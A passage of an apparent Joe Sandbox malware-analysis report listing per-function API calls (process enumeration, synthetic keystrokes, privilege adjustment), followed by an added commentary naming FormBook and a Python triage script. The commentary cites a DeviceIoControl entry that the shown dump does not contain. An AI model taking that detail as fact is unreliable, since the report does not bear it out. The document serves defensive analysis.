                                                                                       • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                      • String ID: *.*
                                                                                      • API String ID: 1972594611-438819550
                                                                                      • Opcode ID: 7df0a50f4a3a89fb4a58e9373511f989fa28205be31bb8fc925faa9581a8153e
                                                                                      • Instruction ID: 3ac44d4ff78999e4f74b1ea33c8873cadde8860617dcecc82b4f1edb507b8333
                                                                                      • Opcode Fuzzy Hash: 7df0a50f4a3a89fb4a58e9373511f989fa28205be31bb8fc925faa9581a8153e
                                                                                      • Instruction Fuzzy Hash: 4541717190020AAFDF15EFA4C885AFEBBB4EF46314F14415AE815A3191EB319F84DF64
                                                                                      APIs
                                                                                        • Part of subcall function 00C29BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C29BB2
                                                                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 00C29A4E
                                                                                      • GetSysColor.USER32(0000000F), ref: 00C29B23
                                                                                      • SetBkColor.GDI32(?,00000000), ref: 00C29B36
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                       • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Color$LongProcWindow
                                                                                      • String ID:
                                                                                      • API String ID: 3131106179-0
                                                                                      • Opcode ID: 95f9e1c0417b10cf0901eb4a7801236ec78a4380d3bffb4c27e412d5ef429c91
                                                                                      • Instruction ID: ff0996f53c95b79afa399f1ae77a3d5149b16e116aec00ae80e0c45a4e75c88b
                                                                                      • Opcode Fuzzy Hash: 95f9e1c0417b10cf0901eb4a7801236ec78a4380d3bffb4c27e412d5ef429c91
                                                                                      • Instruction Fuzzy Hash: F3A13770108564EEE739AA2DACC9E7F269DDF43308F150609F522DADA1CA35DE41E271
                                                                                      APIs
                                                                                        • Part of subcall function 00C9304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00C9307A
                                                                                        • Part of subcall function 00C9304E: _wcslen.LIBCMT ref: 00C9309B
                                                                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00C9185D
                                                                                      • WSAGetLastError.WSOCK32 ref: 00C91884
                                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00C918DB
                                                                                      • WSAGetLastError.WSOCK32 ref: 00C918E6
                                                                                      • closesocket.WSOCK32(00000000), ref: 00C91915
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                       • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                      • String ID:
                                                                                      • API String ID: 1601658205-0
                                                                                      • Opcode ID: 722c28c48615a5d6fe5660fd411ba61465aef6c286d4e14202123984ddc28ea1
                                                                                      • Instruction ID: 3d5584aac58c5453319ee5b3a5e6110b8948b8ee40130347cc91b7d1dfcb5fe0
                                                                                      • Opcode Fuzzy Hash: 722c28c48615a5d6fe5660fd411ba61465aef6c286d4e14202123984ddc28ea1
                                                                                      • Instruction Fuzzy Hash: D651B371A00210AFDB10AF24D88AF6A77E5AB45718F188098F9159F3D3D771ED41EBA1
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                       • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                      • String ID:
                                                                                      • API String ID: 292994002-0
                                                                                      • Opcode ID: 965189be93c78b4bcd2a5cc7af28b0b3097fe1e03be2cecd9f80c05680f928d7
                                                                                      • Instruction ID: 52459e67f90c1292a1c9c0ce949a117be2bbf1a752b3bc49b672a58e89a346f3
                                                                                      • Opcode Fuzzy Hash: 965189be93c78b4bcd2a5cc7af28b0b3097fe1e03be2cecd9f80c05680f928d7
                                                                                      • Instruction Fuzzy Hash: 66219F317406125FD7218F2AC884B6A7BE5EF8632CF1D8068E8568B351CB71ED42DB94
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                       • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                      • API String ID: 0-1546025612
                                                                                      • Opcode ID: 1a38536d152957bac10c73461c9699d211b5c5b5de7b6ec4b75f7ae0d24172de
                                                                                      • Instruction ID: fe406dc31e7628f22cc89dd2df615f0e82a2a9415cb22bdb497157a3d48a6544
                                                                                      • Opcode Fuzzy Hash: 1a38536d152957bac10c73461c9699d211b5c5b5de7b6ec4b75f7ae0d24172de
                                                                                      • Instruction Fuzzy Hash: 41A2AE74E0461ACBDF24CF58C8507EEB7B1BB55311F6481A9EC25A7280EB309EC9DB94
                                                                                      APIs
                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00C9A6AC
                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00C9A6BA
                                                                                        • Part of subcall function 00C19CB3: _wcslen.LIBCMT ref: 00C19CBD
                                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00C9A79C
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00C9A7AB
                                                                                        • Part of subcall function 00C2CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00C53303,?), ref: 00C2CE8A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                      • String ID:
                                                                                      • API String ID: 1991900642-0
                                                                                      • Opcode ID: 8bde808e5fa1824645ccd3ab2320186f731746ef347c8706e1c638530ab1bf5a
                                                                                      • Instruction ID: 87d1226208ae7f8bd34dadf69b56f9e7adfb33f89a69ddd7400186edd0b8f14f
                                                                                      • Opcode Fuzzy Hash: 8bde808e5fa1824645ccd3ab2320186f731746ef347c8706e1c638530ab1bf5a
                                                                                      • Instruction Fuzzy Hash: 95517D71508300AFD710EF24D886AAFBBE8FF89754F00891DF595972A1EB30D945DB92
                                                                                      APIs
                                                                                      • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00C7AAAC
                                                                                      • SetKeyboardState.USER32(00000080), ref: 00C7AAC8
                                                                                      • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00C7AB36
                                                                                      • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00C7AB88
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                      • String ID:
                                                                                      • API String ID: 432972143-0
                                                                                      • Opcode ID: 02f17f708fb345e748fc4d95405730061295b07a539c662b5f0ee1eb2e912122
                                                                                      • Instruction ID: f2b0867b383ab15e6023c237aa8df25e781761fb8164e487c19ef1caeb707cf3
                                                                                      • Opcode Fuzzy Hash: 02f17f708fb345e748fc4d95405730061295b07a539c662b5f0ee1eb2e912122
                                                                                      • Instruction Fuzzy Hash: 0C311870A40208AFFF35CA65CC05BFE7BA6EBC5310F04C21AF199561D1D3749A85D7A2
                                                                                      APIs
                                                                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 00C8CE89
                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 00C8CEEA
                                                                                      • SetEvent.KERNEL32(?,?,00000000), ref: 00C8CEFE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorEventFileInternetLastRead
                                                                                      • String ID:
                                                                                      • API String ID: 234945975-0
                                                                                      • Opcode ID: 23610c7ac831c0e3ba280ac5e41b62580356e9fd803e50357c981c966e46277d
                                                                                      • Instruction ID: f72ce9c5a990b5995e92bf70b9c9cc8d674e1a75c593d77ff1f933ee7c3f7191
                                                                                      • Opcode Fuzzy Hash: 23610c7ac831c0e3ba280ac5e41b62580356e9fd803e50357c981c966e46277d
                                                                                      • Instruction Fuzzy Hash: 5321BD71500305ABEB30EFA5C988BAAB7F8EB50318F10441EE656D2151EB74EE049B68
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(?,00C55222), ref: 00C7DBCE
                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00C7DBDD
                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00C7DBEE
                                                                                      • FindClose.KERNEL32(00000000), ref: 00C7DBFA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 2695905019-0
                                                                                      • Opcode ID: 09936a12f3b828499f5ad5561e9a90abf904e6ea74b02d1446beaba855f16bad
                                                                                      • Instruction ID: e0794c964b10a23d153e378ba6399be198a66a8eee4deb213e2b266c6d930c75
                                                                                      • Opcode Fuzzy Hash: 09936a12f3b828499f5ad5561e9a90abf904e6ea74b02d1446beaba855f16bad
                                                                                      • Instruction Fuzzy Hash: 43F0A9308109106783216B78AC4DAAE37BC9F02338F108702F83BC20F0EBB09E948696
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00C782AA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrlen
                                                                                      • String ID: ($|
                                                                                      • API String ID: 1659193697-1631851259
                                                                                      • Opcode ID: 6336f9ab3d8444130277ae4fc2262ee1fe76a6a4a4700f598d3514d2a2894a7e
                                                                                      • Instruction ID: ae9bd85e39902a8ff3419827db06c5350606f1c3d08549a44b5cd1cf9f165d30
                                                                                      • Opcode Fuzzy Hash: 6336f9ab3d8444130277ae4fc2262ee1fe76a6a4a4700f598d3514d2a2894a7e
                                                                                      • Instruction Fuzzy Hash: C9323674A007059FCB28CF69C085A6AB7F0FF48710B15C56EE5AADB7A1EB70E941CB50
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00C85CC1
                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00C85D17
                                                                                      • FindClose.KERNEL32(?), ref: 00C85D5F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                      • String ID:
                                                                                      • API String ID: 3541575487-0
                                                                                      • Opcode ID: 75d505219ced884733e017673710441ff6e21b58a59d4b9cb28e333c3f0094e3
                                                                                      • Instruction ID: 31bfc3ddfbca2101ed57623dd027a17c45aa67d015f4031f2540ef8a09a4aa63
                                                                                      • Opcode Fuzzy Hash: 75d505219ced884733e017673710441ff6e21b58a59d4b9cb28e333c3f0094e3
                                                                                      • Instruction Fuzzy Hash: 27519974604A019FC714EF28C494A9AB7E4FF4A318F14855EE96A8B3A2CB70ED45CF91
                                                                                      APIs
                                                                                      • IsDebuggerPresent.KERNEL32 ref: 00C4271A
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C42724
                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 00C42731
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                      • String ID:
                                                                                      • API String ID: 3906539128-0
                                                                                      • Opcode ID: b2a2e7f47e5e7b916f240b3926fbcc8c6ab46d69a26f538d0bff18c11d64a6b9
                                                                                      • Instruction ID: 8c30f725d9dec06c0dd91ae06de8547ee204fd7c8bfb8ed0fc42230bda738134
                                                                                      • Opcode Fuzzy Hash: b2a2e7f47e5e7b916f240b3926fbcc8c6ab46d69a26f538d0bff18c11d64a6b9
                                                                                      • Instruction Fuzzy Hash: E531A27591121CABCB21DF68D9897DDBBB8BF08310F5041EAE81CA7261E7709F819F45
                                                                                      APIs
                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00C851DA
                                                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00C85238
                                                                                      • SetErrorMode.KERNEL32(00000000), ref: 00C852A1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorMode$DiskFreeSpace
                                                                                      • String ID:
                                                                                      • API String ID: 1682464887-0
                                                                                      • Opcode ID: cd57ff228f3b2430ba7b32fc8d2e35d163823a9a3ef9feef6c51dd38eee506aa
                                                                                      • Instruction ID: 61caebde287bb17ff8940858f865fa32334aa1ca2f121f1d68023dcc5453e6e0
                                                                                      • Opcode Fuzzy Hash: cd57ff228f3b2430ba7b32fc8d2e35d163823a9a3ef9feef6c51dd38eee506aa
                                                                                      • Instruction Fuzzy Hash: BC312B75A005189FDB00EF94D8C4FADBBB5FF49318F048099E905AB3A2DB71E956CB90
                                                                                      APIs
                                                                                        • Part of subcall function 00C2FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00C30668
                                                                                        • Part of subcall function 00C2FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00C30685
                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C7170D
                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C7173A
                                                                                      • GetLastError.KERNEL32 ref: 00C7174A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                      • String ID:
                                                                                      • API String ID: 577356006-0
                                                                                      • Opcode ID: b1aebc82c77fbeec29345821733e92431267869ddd0f1523c3156b684f75b376
                                                                                      • Instruction ID: 95afc9644fc49420901adc2015bfe554fce427b6e08aecd6252694bed578d075
                                                                                      • Opcode Fuzzy Hash: b1aebc82c77fbeec29345821733e92431267869ddd0f1523c3156b684f75b376
                                                                                      • Instruction Fuzzy Hash: 2E1191B2414308AFD7189F54ECC6E6AB7BDEB44714B24C52EF45657641EB70BC428A20
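The per-function "APIs" bullets are the most useful triage signal in these entries: the KERNEL32 chain at 00C9A6AC (CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, CloseHandle, with a CompareStringW subcall whose arguments 0x409 and 0x1 are the en-US LCID and NORM_IGNORECASE) walks the process list and compares names case-insensitively; the USER32 chain at 00C7AAAC (SetKeyboardState, PostMessageW with message 0x102, which is WM_CHAR, and SendInput) synthesizes keystrokes; 00C7170D enables a token privilege via LookupPrivilegeValueW and AdjustTokenPrivileges; and the entry immediately below issues DeviceIoControl with control code 0x2D1400, which decodes to device type 0x2D (FILE_DEVICE_MASS_STORAGE), function 0x500, METHOD_BUFFERED, FILE_ANY_ACCESS, i.e. IOCTL_STORAGE_QUERY_PROPERTY. The Python below is an added example, not Joe Sandbox, AutoIt or FormBook code: it parses those bullet lines into structured calls, tags each function with the capability its API set implies, and splits any literal IOCTL argument into its CTL_CODE fields. The sample input is copied from the entries on this page; the capability table is an assumption chosen for this sample and should be extended for other reports.

```python
"""Triage helper for the per-function "APIs" bullets of a Joe Sandbox report.

Added example, not Joe Sandbox code.  Parses each bullet into
(api, module, args, ref, subcall), tags the function with the capability
its API set implies, and decodes DeviceIoControl control codes.
"""
import re

# Sample input copied from the entries on this page (bullet and indentation
# stripped); keyed by the ref of the first API in each function.
SAMPLE_ENTRIES = {
    "00C9A6AC": [
        "CreateToolhelp32Snapshot.KERNEL32 ref: 00C9A6AC",
        "Process32FirstW.KERNEL32(00000000,?), ref: 00C9A6BA",
        "Part of subcall function 00C19CB3: _wcslen.LIBCMT ref: 00C19CBD",
        "Process32NextW.KERNEL32(00000000,?), ref: 00C9A79C",
        "CloseHandle.KERNEL32(00000000), ref: 00C9A7AB",
        "Part of subcall function 00C2CE60: CompareStringW.KERNEL32"
        "(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00C53303,?), ref: 00C2CE8A",
    ],
    "00C7AAAC": [
        "GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00C7AAAC",
        "SetKeyboardState.USER32(00000080), ref: 00C7AAC8",
        "PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00C7AB36",
        "SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00C7AB88",
    ],
    "00C7170D": [
        "Part of subcall function 00C2FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00C30668",
        "LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C7170D",
        "AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C7173A",
        "GetLastError.KERNEL32 ref: 00C7174A",
    ],
    "00C7D608": [
        "CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00C7D608",
        "DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00C7D645",
        "CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00C7D650",
    ],
}

# One bullet: optional "Part of subcall function X:" prefix, Api.MODULE,
# optional "(args)", then "ref: ADDRESS".
API_LINE = re.compile(
    r"^(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_@]*)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-F]+)\s*$"
)

# Assumed capability rules: every API in the set must occur in the function.
CAPABILITIES = [
    ({"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"}, "process enumeration (Toolhelp32)"),
    ({"SendInput"}, "synthetic keyboard input"),
    ({"LookupPrivilegeValueW", "AdjustTokenPrivileges"}, "token privilege adjustment"),
    ({"DeviceIoControl"}, "device I/O control"),
    ({"IsDebuggerPresent"}, "debugger check"),
]


def parse_api_line(line):
    """Return a dict for an API bullet, or None for headers such as 'Strings'."""
    m = API_LINE.match(line.strip())
    if not m:
        return None
    raw = m.group("args") or ""
    return {"api": m.group("api"), "module": m.group("mod"),
            "args": raw.split(",") if raw else [],
            "ref": m.group("ref"), "subcall": m.group("sub")}


def parse_entry(lines):
    return [c for c in (parse_api_line(l) for l in lines) if c is not None]


def decode_ioctl(code):
    """Split a Windows CTL_CODE value: DeviceType<<16 | Access<<14 | Function<<2 | Method."""
    return {"device_type": (code >> 16) & 0xFFFF, "access": (code >> 14) & 0x3,
            "function": (code >> 2) & 0xFFF, "method": code & 0x3}


def tag_capabilities(calls):
    seen = {c["api"] for c in calls}
    return [label for needed, label in CAPABILITIES if needed <= seen]


def ioctls_in(calls):
    """Decoded control codes for DeviceIoControl calls whose 2nd argument is a literal, not '?'."""
    out = []
    for c in calls:
        if c["api"] == "DeviceIoControl" and len(c["args"]) > 1 and c["args"][1] != "?":
            code = int(c["args"][1], 16)
            out.append((code, decode_ioctl(code)))
    return out


def triage(entries):
    """Map each function ref to its parsed calls, capability tags and decoded IOCTLs."""
    report = {}
    for ref, lines in entries.items():
        calls = parse_entry(lines)
        report[ref] = {"calls": calls, "capabilities": tag_capabilities(calls),
                       "ioctls": ioctls_in(calls)}
    return report


if __name__ == "__main__":
    for ref, info in triage(SAMPLE_ENTRIES).items():
        print(ref, [c["api"] for c in info["calls"]], info["capabilities"],
              [(hex(code), fields) for code, fields in info["ioctls"]])
```

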